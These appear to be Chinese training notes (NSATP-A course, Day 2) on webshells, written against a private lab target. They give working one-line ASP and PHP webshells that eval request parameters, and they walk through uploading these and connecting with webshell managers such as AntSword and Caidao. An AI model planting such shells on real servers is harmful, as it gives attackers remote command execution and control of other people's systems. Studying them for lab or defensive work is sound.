NSATP-A学习笔记之Day2-1webshell介绍

Posted 火星上烤鱼

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了NSATP-A学习笔记之Day2-1webshell介绍相关的知识,希望对你有一定的参考价值。

Webshell和Webshell管理工具-基础实验

实验目的

  • 用菜刀、蚁剑、冰蝎等工具连接ASP、php、JSP的webshell

实验环境

  • 目标机:Windows Server 2012R2 IIS+Wamp(Phpstudy)+Tomcat
  • 目标机ip:172.16.12.2

实验步骤


ASP大马环境

1、访问IP:172.16.12.2,可以看到如图界面

2、构造ASP一句话马:<% eval request("qwe") %>,key为qwe,并保存文件名为shell.asp

3、上传ASP一句话马文件(这里会将上传文件自动改名为webshell.asp)

4、打开Wbeshell管理工具(这里选择蚁剑),右键添加数据

5、URL地址为http://172.16.12.2/webshell.asp添加成功并测试连接,连接成功

JSP大马环境

1、访问IP:172.16.12.2,可以看到如图界面

2、JSP大马环境已经提前上传大马文件到服务器,点击访问输入密码123即可

PHP环境上传Webshell

1、访问IP:172.16.12.2,可以看到如图界面

2、构造PHP一句话马:<?php @eval($_POST['cmd']);?>,key为cmd,并保存文件名为shell.php

3、上传PHP一句话马文件(此处默认将文件保存在images目录下)

4、打开Wbeshell管理工具(这里选择菜刀),右键添加数据

5、URL地址为http://172.16.12.2/images/shell.php,连接成功

免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!

以上是关于NSATP-A学习笔记之Day2-1webshell介绍的主要内容,如果未能解决你的问题,请参考以下文章

NSATP-A学习笔记之Day2-6hydra爆破

NSATP-A学习笔记之Day2-1webshell介绍

NSATP-A学习笔记之Day4-5实战2

NSATP-A学习笔记之Day2-5burp爆破

NSATP-A学习笔记之Day3-4常见注入类型

NSATP-A学习笔记之Day3-2注入原理